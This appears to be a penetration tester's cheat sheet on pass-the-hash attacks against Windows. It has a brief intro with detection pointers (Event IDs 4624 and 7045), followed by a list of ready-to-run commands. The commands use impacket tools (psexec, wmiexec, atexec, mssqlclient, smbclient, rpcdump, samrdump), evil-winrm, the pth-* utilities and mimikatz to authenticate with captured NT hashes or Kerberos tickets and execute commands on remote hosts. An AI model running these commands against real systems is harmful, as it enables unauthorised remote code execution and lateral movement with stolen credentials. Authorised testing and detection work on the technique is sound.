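Pass the Hash
Authenticating to Windows services with a captured NT hash in place of the password. The two `-k` examples below authenticate with a Kerberos ticket rather than a hash. On the defensive side, hash-based access typically appears on the target as an NTLM network logon (Event ID 4624, logon type 3), and PsExec-style execution also installs a service (Event ID 7045).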
https://vk9-sec.com/impacket-remote-code-execution-rce-on-windows-from-linux/
PsExec
proxychains -q psexec.py -k -no-pass domain.com/username@machine -dc-ip IP -target-ip IP
python psexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 Administrator@192.168.1.2
WinRM
evil-winrm -i 192.168.1.2 -u [domain\\]username -H 052e763020c5da81d4085a05e69b0f1b
WMI
python3 impacket/examples/wmiexec.py -k -no-pass [domain/]username@192.168.1.2
SQL
python3 impacket/examples/mssqlclient.py -p 1433 -windows-auth domain/username@1.1.1.1 -hashes :052e763020c5da81d4085a05e69b0f1b
Mimikatz
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:admin /domain:red.local /ntlm:09238831b1af5edab93c773f56409d96" exit
other
python smbclient.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.2
pth-smbclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.2/c$
pth-wmic -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.2 "select Name from Win32_UserAccount"
python rpcdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.2
pth-rpcclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.2
pth-net rpc share list -U 'ignite\Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38' -S 192.168.1.2
python atexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 Administrator@192.168.1.2 whoami
python lookupsid.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.2
python samrdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.2